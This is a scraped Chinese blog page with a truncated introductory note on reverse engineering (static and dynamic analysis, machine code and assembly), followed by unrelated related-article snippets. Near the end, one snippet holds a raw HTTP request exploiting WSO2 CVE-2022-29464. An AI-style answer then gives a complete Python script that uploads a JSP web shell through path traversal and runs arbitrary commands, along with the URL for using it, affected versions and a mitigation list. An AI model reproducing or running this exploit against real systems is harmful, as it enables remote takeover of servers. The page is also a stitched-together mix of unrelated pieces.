1.关于逆向工程(RE、RCE)-笔记

最新推荐文章于 2025-10-15 14:44:39 发布
原创 最新推荐文章于 2025-10-15 14:44:39 发布 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#逆向工程 #RE #RCE #逆向

本文介绍了逆向工程(RE)和代码逆向工程(RCE)的概念,详细阐述了静态分析和动态分析两种逆向分析方法,包括如何通过观察文件外部特征、使用反汇编工具及调试器来理解程序行为。同时,讨论了源代码、十六进制代码和汇编代码之间的关系,以及在逆向工程中反编译工具如IDA和OD的应用。
  1. 名词

    逆向工程(Reverse Engineering,简称RE);代码逆向工程(Reverse Code Engineering,简称RCE)。

  1. 逆向分析方法

    静态分析:不执行代码,观察外部特征、获取文件类型、大小、PE头信息、Import/ExportAPI、内部字符串、是否运行时解压缩、注册信息、调试信息、数字证书等。同时还经常使用反汇编工具查看内部代码、分析代码。

动态分析:程序文件执行过程中分析,通过调试来分析代码流,获得内存的状态。可以观察文件、注册表、网络等的同时分析软件的行为。此外动态分析常用调试器分析程序的内部结构与动作原理。

  1. 源代码、十六进制代码、汇编代码

平时编程写的代码被称为源代码(vs2015):

 

写完代码进行编译链接之后生成的可执行文件,用相关工具打开,就能看到十六进制机器码。(010Editor)

最低0.47元/天 解锁文章
2021-11-16 Re 逆向工程略览 一 寄存器内存和栈【T.O.CTF】
Menou16的博客
11-17 936
CTF逆向的基础知识(持续更新)
逆向入门——Re题解
crispr的博客
07-31 2446
前言 又是划水的最近,花了几天时间来入门逆向,二进制师傅是大爷,觉得自己会一点onlydbg和ida啥的,来做一做攻防世界的Re题,发现很多都是要看题解才能完成(tcl没办法),这里碰到两个有意思的题来分析分析 正文 csaw2013reversing2 拖到Exeinfo里看一看发现: 无壳,在拖到PEiD中看看发现: 话不多说,直接ida pro32打开看一看,找到main()函数后一键F5看看伪码: 用我菜的不能再菜的C语言基础分析一下大致就是: 先创建了一个私有堆,然后在这个私有堆上分配了指定
Delphi逆向工程笔记
01-14
看雪论坛上搜集的资料,将其整理成CHM文档
RE 逆向工程初学者指南:方法和工具
weixin_30550081的博客
06-18 625
简评: RE 两种分析,静态、动态。好好分析静态因为能够解决 70 % 的问题。介绍了一些工具和方法。Enjoy yourself. 最近几天,我决定试水逆向工程,即使在计算机和编程相关领域有一定的基础,我也被很多信息和操作的代码所困扰,这让我很蒙圈。 逆向工程乍看起来似乎很复杂,但是通过一些好方法和工具包,一切都变得清晰而唾手可及。 本文根据我的一些经验来指导你,希望助你迈好进入这个新世界...
网安渗透测试教程—RCE远程代码执行漏洞详解!零基础小白入门教程建议收藏!
最新发布
qq_41314882的博客
10-15 577
RCE(远程代码执行)漏洞是一种高危安全漏洞,允许攻击者在目标系统上执行任意命令或代码,从而控制系统。该漏洞通常因应用程序未严格验证用户输入导致,攻击者可通过构造恶意指令利用系统函数执行命令。PHP中常见的危险函数包括exec、system、passthru等,这些函数若未过滤用户输入,就可能被恶意利用。命令执行漏洞可视为RCE的子集,其利用方式包括通过特殊符号拼接命令(如Windows的|、||等)。防御此类漏洞需严格过滤用户输入,避免直接拼接系统命令。
关于逆向工程
wk19951125的博客
02-01 422
关于逆向工程逆向工程代码逆向工程逆向分析的方法静态分析动态分析源代码、十六进制代码、汇编代码“打补丁”与“破解”参考文献 逆向工程 逆向工程RE):一般指通过分析物体、设备或系统了解其结构、功能以及行为等,掌握其中的原理并改善不足之处。 代码逆向工程 代码逆向工程RCE):是逆向工程在软件领域的应用。 逆向分析的方法 静态分析 静态分析是在不执行代码的情况下对代码进行分析,包括:文件类型、大小...
Exploit-Nagios-XI-5.7.X_Remote-Code-Execution-RCE-Authenticated:Nagios XI 5.7.X-远程执行代码RCE(已认证)
04-10
利用Nagios-XI-5.7.X远程代码执行RCE身份验证 Nagios XI 5.7.X-远程执行代码RCE(已认证)
cas4.x-execution-rce:exp for 4.1.x-4.1.6,4.1.7-4.2.x,填充oracle攻击
04-14
在压缩包子文件"cas4.x-execution-rce-master"中,我们可以期待找到与这个漏洞相关的源代码、说明文档、测试用例等资源。通常,这类文件夹结构会包含README文件,详细解释如何使用exploit,以及可能的依赖项。代码...
CVE-2020-0688 Exchange RCE 任意命令执行
03-29
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
Re-For-Beginners(逆向工程入门)
08-31
本书是由乌云内部人员翻译的,是学习破解的初学的不可多的教材,讲的深入浅出。
2018 第十一届全国大学生信息安全竞赛 逆向RE 资源文件
05-04
2018 第十一届全国大学生信息安全竞赛 逆向RE 资源文件 由于长度限制390M结果可以脚本跑,不再上传
CTF逆向reverse)入门脑图
10-25
CTF逆向reverse)入门脑图,xmind格式文件。Reverse即逆向工程,题目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译扎实功底。主要考查参赛选手的逆向分析能力。 仅供CTF竞赛参考使用,请不要做违法乱纪的事情
逆向工程简介
weixin_45932243的博客
10-17 1111
逆向工程Reverse Engineering,简称RE),一般指通过分析物体、机械设备或系统,了解其结构、功能、行为等,掌握其中原理并改善不足之处,添加新创意的一系列过程。
【翻译】Delphi中类的逆向工程
wowbell的专栏
01-05 1499
标 题: 【翻译】Delphi中类的逆向工程 作 者: firstrose 时 间: 2004-12-09,18:37:44 链 接: http://bbs.pediy.com/showthread.php?t=8209 前段时间看到NB王(就是说nbw:D……喂,nbw你不生气吧?)转的文章,觉得很有用。于是想翻译一下。无奈本人太懒,拖到现在。不过总算在今天晚饭以前赶完了:D
逆向re笔记
BL_zshaom的博客
01-23 347
笔记
逆向工程作业
weixin_46601374的博客
09-26 1262
.什么是逆向工程? 简称RE,一般指,通过分析物体,机械设备或系统,了解其结构,功能,行为等。 二.代码逆向工程是什么? 代码逆向工程(Reverse Code Engineering,简称RCE )逆向工程在软件领域中的应用,目 前还没有准确而统一的术语,实际交流中经常出现混用的情况,常用术语有RCERE逆向工 程等,使用起来较为随意。 三.逆向工程的分析法 1.静态分析法 静态分析法是在不执行代码文件的情形下,对代码进行静态分析的一种方法。静态分析时并 不执行代码,而是观察代码文件的
__stdcall,__cdecl,__pascal,__fastcall的区别
DynamicComp的专栏
07-01 524
__cdecl __cdecl 是 C Declaration  的缩写,表示 C 语言默认的函数调用方法:所有参数从右到左依次入栈,这些参数由调用者清除,称为手动清栈。被调用函数不会要求调用者传递多少参数,调用者传递过多或者过少的参数,甚至完全不同的参数都不会产生编译阶段的错误。 __stdcall __stdcall 是 Standard Call 的缩写,是 C++ 的
POST /fileupload/toolsAny HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 x-jsl-scheme: https host: www.xinhuawuye.com:10441 x-jsl-port: 443 x-from: JSL accept-encoding: gzip content-type: multipart/form-data; boundary=WebKitFormBoundaryhpabonve content-length: 310 real-remote-addr: 175.139.32.241 x-forwarded-for: 175.139.32.241 x-real-forwarded-for: 175.139.32.241 x-connecting-ip: 175.139.32.241--WebKitFormBoundaryhpabonve Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/qadpwowhyqhdzmltfrmgotxewco.jsp";filename="test.jsp" Content-Type:application/octet-stream <% out.print("WSO2-RCE-CVE-2022-29464"); %> --WebKitFormBoundaryhpabonve--
07-10
### 3.2 WSO2 文件上传漏洞(CVE-2022-29464)的远程代码执行利用方式 WSO2 是一套广泛用于企业级 API 管理、身份认证和集成服务的中间件平台,其多个版本中存在一个严重的任意文件上传漏洞(CVE-2022-29464),攻击者可利用该漏洞在未授权的情况下上传恶意 JSP 文件并实现远程代码执行(RCE)[^1]。 此漏洞的核心在于 WSO2 的 `/fileupload` 接口对上传路径和文件内容缺乏有效校验。攻击者可通过构造特定路径的上传请求,将包含恶意脚本的 `.jsp` 文件写入服务器的 Web 可访问目录,从而触发代码执行。例如,上传到 `authenticationendpoint` 或 `scim20endpoint` 子路径下的 JSP 文件会被服务器当作动态页面解析并执行其中的 Java 代码[^2]。 #### 3.2.1 漏洞利用流程 攻击者通常采用以下步骤完成对该漏洞的利用: - **构建恶意JSP文件**:创建包含远程命令执行逻辑的 JSP 脚本,例如使用 `Runtime.getRuntime().exec()` 方法执行系统命令。 - **构造上传请求**:向 `/fileupload/toolsAny` 接口发送 POST 请求,并通过修改路径参数将文件上传至目标 Web 目录,如 `../../../../repository/deployment/server/webapps/authenticationendpoint/`。 - **触发WebShell执行**:成功上传后,通过浏览器或工具访问该 JSP 文件以激活远程控制功能,实现命令注入和进一步横向渗透[^3]。 #### 3.2.2 示例EXP与攻击载荷 以下是基于 Python 的漏洞利用脚本示例,使用 `requests` 库向目标服务器发送恶意上传请求,并指定路径将 `.jsp` 文件写入可执行目录: ```python import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url = input("请输入URL:") file = "shell.jsp" payload = """<FORM> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd, null, null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s + "<br>"; } } catch(IOException e) { e.printStackTrace(); } } %> <pre><%=output %></pre>""" files = { "../../../../repository/deployment/server/webapps/authenticationendpoint/{0}".format(file): payload } response = requests.post(f"{url}/fileupload/toolsAny", files=files, verify=False) print(f"shell @ {url}/authenticationendpoint/{file}") ``` 运行上述脚本后,若上传成功,攻击者可通过访问 `https://<target>/authenticationendpoint/shell.jsp?cmd=id` 来执行任意系统命令并获取输出结果。 #### 3.2.3 攻击影响范围与缓解建议 该漏洞影响广泛的 WSO2 产品线,包括但不限于: - WSO2 API Manager 2.2.0 至 4.0.0 - WSO2 Identity Server 5.2.0 至 5.11.0 - WSO2 Enterprise Integrator 6.2.0 至 6.6.0 建议受影响组织尽快升级至官方发布的修复版本,并采取以下防护措施: - 配置严格的上传路径限制策略,避免文件被写入 Web 根目录; - 对上传文件进行内容扫描,识别并阻断包含 `<%`, `eval`, `Runtime.getRuntime()` 等关键字的脚本; - 启用 WAF 规则,检测异常的 `/fileupload` 请求行为; - 关闭不必要的调试接口和服务,减少攻击面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值